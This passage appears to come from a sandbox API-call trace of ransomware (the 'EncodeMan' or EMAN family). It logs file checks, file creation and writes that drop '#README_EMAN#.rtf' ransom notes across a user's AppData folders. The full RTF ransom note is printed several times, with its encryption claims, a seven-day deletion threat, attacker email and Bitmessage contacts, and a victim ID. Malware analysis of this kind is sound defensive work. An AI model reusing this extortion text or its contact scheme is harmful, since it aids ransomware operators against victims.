ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n³:Ý\x11\x97b\x1c\x19dÁÎ\x1dتxU¼É¯\x84\x82\x186Ó\x19", lpUsedDefaultChar=0x0) returned 8717 [0301.689] WriteFile (in: hFile=0x27c, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0301.689] CloseHandle (hObject=0x27c) returned 1 [0301.689] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00009376\\#readme_eman#.rtf")) returned 0x20 [0301.689] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\#readme_eman#.rtf")) returned 0x20 [0301.689] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\#readme_eman#.rtf")) returned 0x20 [0301.689] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\#readme_eman#.rtf")) returned 0x20 [0301.690] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\#readme_eman#.rtf")) returned 0xffffffff [0301.690] GetLastError () returned 0x2 [0301.690] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\is\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\is\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0301.690] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.690] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.690] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) 